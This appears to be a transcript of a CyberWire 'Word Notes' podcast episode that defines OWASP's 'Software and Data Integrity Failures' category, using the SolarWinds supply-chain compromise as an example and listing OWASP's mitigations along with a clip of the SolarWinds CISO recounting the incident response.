OWASP software and data integrity failures (noun) [Word Notes]

A

You're listening to the Cyberwire network, powered by N2K. And now a word from our sponsor, ThreatLocker keeping your system secure shouldn't mean constantly reacting to threats. ThreatLocker helps you take a different approach by giving you full control over what software can run in your environment. If it's not approved, it doesn't run. Simple as that. It's a way to stop ransomware and other attacks before they start without adding extra complexity to your day. See how ThreatLocker can help you lock down your environment at www.threatlocker.com.

B

The word is OWASP Software and data integrity Fail spelled O for open W for Web A for application S for security P for project software for instructions that tell a computer what to do Data for information stored on a computer and integrity failures for support structures that are supposed to be sound that turn out to be faulty code and data repositories that don't protect against unauthorized changes. Example Sentence Software and data integrity failures happen when an application relies upon plugins, libraries, or modules from untrusted resources, repositories, and content Delivery networks, or CDNs. Origin and context David Wickers and Jeff Williams, working for Aspect Security, a software consultant company, published an education piece in 2003 on the top software security coding issues of the day that eventually turned into the OWASP top 10, a reference document describing the most critical security concerns for Web applications. Today, OWASP is an international team of security professionals that led by the foundation executive director and top 10 project leader Andrew van der Stock. In 2021, the committee created a new category called Software and Data Integrity Failures and listed it at the number 8 position. The main idea is to protect code and data sources from unauthorized and undetected change. OWASP pundits have cited the 2020 SolarWinds compromise as the perfect example of this kind of failure. In that attack campaign, hacker group APT29, also known as Nobelium, compromised the SolarWinds network, found the company's code repository, and inserted a Remote Access Trojan, or RAT, into the SolarWinds Orion product, a commercial network management system. When some 18,000 customers downloaded the next software update for the Orion product, they also downloaded the rat. OWASP recommends several mitigation tactics to defeat this kind of attack vector. 1. Sign internally developed software and insist commercial and open source software that you use does the same. 2. Verify that you're only using code libraries from trusted repositories. 3. Scan internally developed and open source software for known vulnerabilities. 4. Establish a review process for code and configuration changes. And finally five enforce segregation, configuration and access controls on your continuous integration continuous deployment pipeline. In the Aftermath of the APT29 attacks, the SolarWinds CISO Tim Brown rolled out a new software design strategy he called Secure by Design that incorporates many of the OWASP recommendations. But I want to be clear here. None of these mitigation strategies, if implemented by any of the 18,000 SolarWinds customers, would have protected them from the APT29 attack. From their view, the attack is a supply chain attack from a trusted vendor. Their best bet to reduce the probability of supply chain risk is to pursue a robust zero trust strategy by severely limiting permissions and access by the Orion product. On the other hand, the OWASH recommendations are for those organizations who build their own software intended for both external and perhaps internal use, like Solar Winds. Nerd reference in November 2021, MJ Shore, the senior Vice President and Executive Director at the CompTIA ISAO, hosted Tim Brown, the SolarWinds CISO, to discuss the APT29 attack. This clip is Tim describing his response in the initial hours after the attack notification.

C

December 12th. So it was a Saturday. Our CEO got a from Kevin Mandia and said, hey, we believe that you've shipped tainted code. Of course, I got a call very quickly after that and then got a call with the CTO for FireEye. We went through details very quickly. We realized that yes, that's the case. So we started marshaling people together and started working on kind of the response. This one was different in that we didn't need to do a lot of research to determine, hey, this was real, right? It was like, boom, got it. It's real. We started pulling the right people together on Saturday and the right people together kind of interesting, right? So that include our legal team. So we have PLA Piper as a external legal counsel. Learned afterwards that they're the largest legal firm in the world, but they came in with their forensics team. With them we brought in CrowdStrike to start really a, you know, macro investigation of the environment and start doing that. So this was all on Saturday, as we're going through stuff first on the phone. Sunday morning we were all in the office and started in a war room just working through all of the details because as a public company on Monday morning or Sunday night, we needed to get information out to essentially the street. So a 10k had to get filed. So timelines were just really compressed. FireEye was planning to be public with their information on Sunday, so there was a lot to do in those first first 24 hours.

B

Word notes is written by Nyla Genoe, executive produced by Peter Kilpe and edited by John Pettrick and me, Rick Howard. The mix, sound design and original music have all been crafted by the ridiculously talented Elliott Peltzman. Thanks for listening.

A

And now a word from our sponsor. Spy Cloud Identity is the new battleground and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. Spy Cloud's holistic identity threat protection helps security teams uncover and automatically remediate hidden exposures across your users from breaches, malware and phishing to neutralize identity based threats like account takeover, fraud and ransomware. Don't let invisible threats compromise your business. Get your free corporate darknet exposure report@spycloud.com cyberwire and see what attackers already know. That's spycloud.com cyberwire.